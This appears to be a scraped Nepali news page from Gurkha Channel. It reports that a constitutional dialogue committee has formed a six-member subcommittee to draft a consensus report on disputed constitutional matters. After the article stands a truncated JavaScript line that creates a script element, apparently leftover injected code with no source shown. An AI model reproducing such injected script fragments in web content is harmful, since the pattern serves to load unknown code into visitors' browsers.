सम्वाद समिति

admin Avatar

संवैधानिक राजनीतिक संवाद तथा सहमति समितिको बैठकले सहमतिको प्रतिवेदन बनाउन ६ सदस्यीय उपसमिति गठन गरेको छ। सिंहदरबारमा बुधबार बसेको समिति बैठकले नेपाली कांग्रेसका सभासद पूर्णबहादुर खड्डाको संयोजकमा उपसमिति गठन गरेको हो। उपसमितिमा एमालेका गोकर्ण विष्ट, एकीकृत माओवादीका कृष्णहादुर महारा, दिलनाथ गिरी, गोपाल दहित र प्रेमबहादुर सिंह रहनुभएको छ। मुख्य दलहरुबीच ८ प्रदेशमा सहमति भएलगत्तै समितिले संविधानका विवादित विषयको एकीकृत प्रतिवेदन बनाउने गृहकार्य गरेको हो।मुख्य राजनीतिक दलहरुबीच सोमबार भएको १६ बुँदे सहमतिका आधारमा सहमति जुटाउने र सहमतिमा असहमत रहेका दल तथा सभासद्का धारणालाई पनि प्रतिवेदनमा समावेश गरेर पठाइने समितिका सभापति डाक्टर बाबुराम भट्टराईले बताउनुभयो। प्रतिवेदन बिहीबार बस्ने संविधानसभामा पेश गर्ने समितिको तयारी छ।

var d=document;var s=d.createElement(‘script’);

About Gurkha Channel

Gurkha channel is the sister company of Gurkha TV and the first 24-hour Nepali channel operating from the international capital of the world,London, United Kingdom. Gurkha Channels believes in honesty, respect, and unity. We belong to the land of Lord Buddha, Mt. Everest, and gallant people who sacrifice their lives for peace and humanity. Therefore, in this world of globalization, it is our effort to bring all Nepalese from around the world together and make one family: one Nation.

Search
Cateegories